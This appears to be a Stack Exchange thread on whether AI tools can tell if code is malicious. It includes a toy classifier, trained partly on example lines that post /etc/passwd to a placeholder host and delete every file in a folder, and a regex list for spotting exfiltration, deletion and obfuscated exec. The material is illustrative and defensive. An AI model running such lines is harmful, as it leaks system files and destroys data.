
A recent question of mine was closed, as I effectively requested code analysis. A comment said:

If you want an analysis, you could pop it into something like chatgpt

Is there any analysis (or are there anecdotes) about how effective modern AI tools are at identifying the true purpose of a piece of code?

  • Malicious code is no different from other code. It’s the context that matters: code that creates a UUID (like yours) for business management is not malicious, but the exact same piece of code used to steal information without authorisation is malicious, because its use is malicious. Commented Jun 27 at 11:04
  • AI could tell you what the code does, but then it’s up to you to decide if that’s ‘malicious.’ Commented Jun 27 at 11:08
  • That does not necessarily matter. These tools are great at finding hidden patterns in data. As long as someone can define a set of code we would like to run and a set we would not, we can measure the predictive power of an algorithm to classify a previously unseen bit of code into one class or the other (see the sketch after these comments). It seems plausible that these tools could have such predictive power; I wondered whether anyone has looked.
    – User65535
    Commented Jun 27 at 11:08
  • "true" purpose is subjective. What you asked for was a functional analysis. LLMs do that very well. I removed the opinion-based and tangential part of your question.
    – schroeder
    Commented Jun 27 at 12:40
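
User65535’s comment above frames this as a supervised classification problem: label code we would and would not want to run, then measure how well a model separates previously unseen snippets. Below is a minimal sketch of that idea with made-up snippets and labels, assuming scikit-learn is available; it only illustrates the mechanics and says nothing about how well such a model would actually perform.

```python
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.linear_model import LogisticRegression

# Tiny made-up corpus: code we would be happy to run (label 0) vs code we would not (label 1).
snippets = [
    "session_id = uuid.uuid4()",
    "log.info('user logged in')",
    "requests.post('https://collector.example/x', data=open('/etc/passwd').read())",
    "for f in os.listdir('.'): os.remove(f)",
]
labels = [0, 0, 1, 1]

# Character n-grams give a crude, parser-free text representation of each snippet.
vectoriser = TfidfVectorizer(analyzer="char_wb", ngram_range=(3, 5))
X = vectoriser.fit_transform(snippets)
clf = LogisticRegression().fit(X, labels)

# Score a previously unseen bit of code; on a real dataset you would hold out a
# test set and report accuracy/precision/recall instead of eyeballing one example.
unseen = "shutil.rmtree('/home/user/documents')"
prob_bad = clf.predict_proba(vectoriser.transform([unseen]))[0][1]
print(f"probability of being in the do-not-run class: {prob_bad:.2f}")
```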

2 Answers

  • The Ömer Aslan one looks amazing if it is credible. Such a small model with apparently incredible accuracy. I wonder how well it generalises.
    – User65535
    Commented Jun 27 at 13:21
  • @User65535 It’s cherry-picking; LLMs are very bad at deobfuscation. Also, you would spend much more time trying to make them do the right thing than doing it yourself in the first place. Commented Jun 27 at 15:12

Like I said in my comment, code itself is neither malicious nor non-malicious. It is how the code is used, and your own opinion of that use, that determines this.

With GPT-4, I confirmed my theory about what the code in your previous question did; it tries to generate a UUID.
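
The OP’s original snippet is not reproduced here, but for illustration, a minimal Python equivalent of “code that generates a UUID” (not the actual code from the question) is just:

```python
# Not the OP's actual code; just the standard way to produce a version-4 UUID in
# Python, to show how unremarkable such code looks on its own.
import uuid

session_id = uuid.uuid4()  # random 128-bit identifier, usable for a session or a tracking cookie
print(session_id)
```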

Take this for example: would this code seem malicious in an environment where good, consented session management is crucial to the client experience? Most people would probably say not.

But would it seem malicious if it were run intrusively and sneakily without you knowing, with the information used for something like cross-site tracking? Most people would probably say yes.

I’m not saying it is doing that (although it could be), but it’s impossible to tell its intentions from the code alone, which is my whole point.

LLMs like ChatGPT don’t have opinions or background information unless you provide them, so while AI is great at identifying what code does, whether it’s malicious is opinionated, situational, and something only you can decide.

  • Classification won’t work well with very generic code like in your example, but that doesn’t mean it’s generally impossible to distinguish between malicious and benign code. For example, there are already large collections of typical attack techniques like MITRE ATT&CK, which show that attackers take very specific actions to systematically collect sensitive data, exfiltrate this data, destroy assets, avoid detection etc. In benign code, such goals and the corresponding actions should be rather unusual (a rough sketch of this idea follows after these comments).
    – Ja1024
    Commented Jun 28 at 3:42
  • Of course there will always be corner cases that lead to both false positives and negatives. I also have no clue how well current ML models actually perform at this task. But the approach is valid. A human analyst is facing the same challenges as an ML model and may even take the same approach: They get unknown code, they don’t necessarily have a lot of context information, but they still have to decide whether the code is (likely) malicious. To solve this, looking for typical attack patterns is an obvious choice, and this is what ML can, in principle, do as well.
    – Ja1024
    Commented Jun 28 at 3:43
  • @Ja1024 Well of course; I entirely agree. LLMs can be really good at spotting certain traffic patterns and data in implementations such as DPI for firewalls. All I am trying to illustrate to the OP is that even in these situations an LLM is still only recognising what is happening: for example, it sees code that will erase all files, and because that is considered ‘malicious’ by its instructions, it reports it. But yes, I totally agree. Commented Jun 28 at 4:30
  • And this is just an example. Commented Jun 28 at 4:31
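
A rough sketch of the approach Ja1024 describes above: flag code that contains actions typical of attack techniques. The regexes and category names below are made-up illustrations only loosely echoing ATT&CK-style tactic categories; this is a crude keyword heuristic, not what a real analyst or model would rely on.

```python
import re

# Made-up patterns for actions that are common in attacks but unusual in benign
# code; the category names only loosely echo MITRE ATT&CK tactic categories.
SUSPICIOUS_PATTERNS = {
    "exfiltration": r"requests\.post\(|urlopen\(.*http|curl .* -d ",
    "data destruction": r"os\.remove\(|shutil\.rmtree\(|rm -rf",
    "defense evasion": r"base64\.b64decode\(|exec\(|eval\(",
}

def flag_code(source: str) -> list[str]:
    """Return the categories whose patterns appear in the given source text."""
    return [name for name, pattern in SUSPICIOUS_PATTERNS.items()
            if re.search(pattern, source)]

# A deliberately suspicious-looking snippet: decodes a blob and executes it.
sample = "payload = base64.b64decode(blob); exec(payload)"
print(flag_code(sample))  # -> ['defense evasion']
```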
